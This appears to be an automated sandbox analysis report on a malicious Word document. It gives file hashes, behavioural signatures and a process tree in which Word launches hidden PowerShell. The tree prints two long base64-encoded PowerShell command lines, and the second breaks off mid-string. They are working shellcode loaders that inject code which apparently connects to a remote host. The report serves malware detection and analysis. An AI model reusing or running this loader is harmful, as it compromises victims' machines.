19bc40c3840a5bd86e372c0e3d5c0ce327a17e0b887a743f7139bb48f7cadd43

General

Target

e9cf1194c4a01dd350d3af0b1afda7f7.doc
Size

42KB
MD5

e9cf1194c4a01dd350d3af0b1afda7f7
SHA1

ea91861865171421a3e77398451f635826c1891d
SHA256

19bc40c3840a5bd86e372c0e3d5c0ce327a17e0b887a743f7139bb48f7cadd43
SHA512

2b1d3983d14d1cf17f6d2784e2250956e6610a597c049653b211aedf02870667cd0be262ceeac5c7533227a4898d36beea58a0afe83b187ef785763303e8e5b1
SSDEEP

384:PGbiSHuT7Uz64PFHjlqh5DhxPccdZlDm1hNCpRP0jUEyMtj/:97UVPFHjW51ZlK1h0pdDE

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3804	4584	powershell.exe	WINWORD.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4584 WINWORD.EXE
4584 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3804 powershell.exe
3804 powershell.exe
1496 powershell.exe
1496 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3804 powershell.exe
Token: SeDebugPrivilege 1496 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

4584 WINWORD.EXE
4584 WINWORD.EXE
4584 WINWORD.EXE
4584 WINWORD.EXE
4584 WINWORD.EXE
4584 WINWORD.EXE
4584 WINWORD.EXE

pid	process
4584	WINWORD.EXE
4584	WINWORD.EXE

pid	process
3804	powershell.exe
3804	powershell.exe
1496	powershell.exe
1496	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe

pid	process
4584	WINWORD.EXE
4584	WINWORD.EXE
4584	WINWORD.EXE
4584	WINWORD.EXE
4584	WINWORD.EXE
4584	WINWORD.EXE
4584	WINWORD.EXE

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

WINWORD.EXEpowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 4584 wrote to memory of 3804	4584	WINWORD.EXE	powershell.exe
PID 4584 wrote to memory of 3804	4584	WINWORD.EXE	powershell.exe
PID 3804 wrote to memory of 1496	3804	powershell.exe	powershell.exe
PID 3804 wrote to memory of 1496	3804	powershell.exe	powershell.exe
PID 3804 wrote to memory of 1496	3804	powershell.exe	powershell.exe
PID 1496 wrote to memory of 3964	1496	powershell.exe	csc.exe
PID 1496 wrote to memory of 3964	1496	powershell.exe	csc.exe
PID 1496 wrote to memory of 3964	1496	powershell.exe	csc.exe
PID 3964 wrote to memory of 3616	3964	csc.exe	cvtres.exe
PID 3964 wrote to memory of 3616	3964	csc.exe	cvtres.exe
PID 3964 wrote to memory of 3616	3964	csc.exe	cvtres.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e9cf1194c4a01dd350d3af0b1afda7f7.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoE -NoP -NonI -W Hidden -E JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAZgAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAMwAxACwAMAB4AGQAMgAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAA4AGIALAAwAHgANwAyACwAMAB4ADIAOAAsADAAeAAwAGYALAAwAHgAYgA3ACwAMAB4ADQAYQAsADAAeAAyADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADQAOQAsADAAeAA3ADUALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAMgAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADcAOAAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA0AGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAA1ADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADcANAAsADAAeAAzAGMALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANAAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlADkALAAwAHgAOAAwACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABkADEALAAwAHgAMAA0ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgANQA2ACwAMAB4ADcAMgAsADAAeAA3AGEALAAwAHgANQAzACwAMAB4ADQAZQAsADAAeAA2ADEALAAwAHgANAA4ACwAMAB4ADMANwAsADAAeAA2ADkALAAwAHgAMwAzACwAMAB4ADMANQAsADAAeAAzADcALAAwAHgANgBlACwAMAB4ADUAOAAsADAAeAA3ADEALAAwAHgANgAzACwAMAB4ADQANwAsADAAeAA0ADUALAAwAHgANwAyACwAMAB4ADQAZAAsADAAeAA0AGUALAAwAHgANgA3ACwAMAB4ADYAYQAsADAAeAA2AGYALAAwAHgANgBhACwAMAB4ADYANQAsADAAeAA3ADMALAAwAHgANgA0ACwAMAB4ADcAOAAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMAMgAsADAAeABlADgALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAwACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwAxACwAMAB4ADMANAAsADAAeAAwADAAOwAkAHMAaQB6AGUAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAHMAaQB6AGUAIAA9ACAAJABzAGMALgBMAGUAbgBnAHQAaAB9ADsAJAB4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAcwBpAHoAZQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHMAYwBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABnAHEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAMQApACkAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAeAA4ADYAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAGMAbQBkACAAPQAgACIALQBuAG8AcAAgAC0AbgBvAG4AaQAgAC0AZQBuAGMAIAAiADsAaQBlAHgAIAAiACYAIAAkAHgAOAA2ACAAJABjAG0AZAAgACQAZwBxACIAfQBlAGwAcwBlAHsAJABjAG0AZAAgAD0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACIAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAGMAbQBkACAAJABnAHEAIgA7AH0A
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3804

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABjACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABzAGMAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADYANAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADMAMAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADAAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADgALAAwAHgAMQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgAwACwAMAB4ADUAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAA2AGUALAAwAHgANgA1ACwAMAB4ADcANAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADMAMQAsADAAeABkAGIALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADUANgAsADAAeAA3ADkALAAwAHgAYQA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4AGQAMQAsADAAeAAwADQALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeABlADgALAAwAHgAYgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAA1ADYALAAwAHgANwAyACwAMAB4ADcAYQAsADAAeAA1ADMALAAwAHgANABlACwAMAB4ADYAMQAsADAAeAA0ADgALAAwAHgAMwA3ACwAMAB4ADYAOQAsADAAeAAzADMALAAwAHgAMwA1ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgANQA4ACwAMAB4ADcAMQAsADAAeAA2ADMALAAwAHgANAA3ACwAMAB4ADQANQAsADAAeAA3ADIALAAwAHgANABkACwAMAB4ADQAZQAsADAAeAA2ADcALAAwAHgANgBhACwAMAB4ADYAZgAsADAAeAA2AGEALAAwAHgANgA1ACwAMAB4ADcAMwAsADAAeAA2ADQALAAwAHgANwA4ACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeAA4ADkALAAwAHgAOQBmACwAMAB4AGMANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAOQAsADAAeABjADYALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMwAyACwAMAB4AGUAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAOAAwACwAMAB4ADMAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADgAOQAsADAAeABlADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADEAZgAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADcANQAsADAAeAA0ADYALAAwAHgAOQBlACwAMAB4ADgANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAAwADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANgAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4A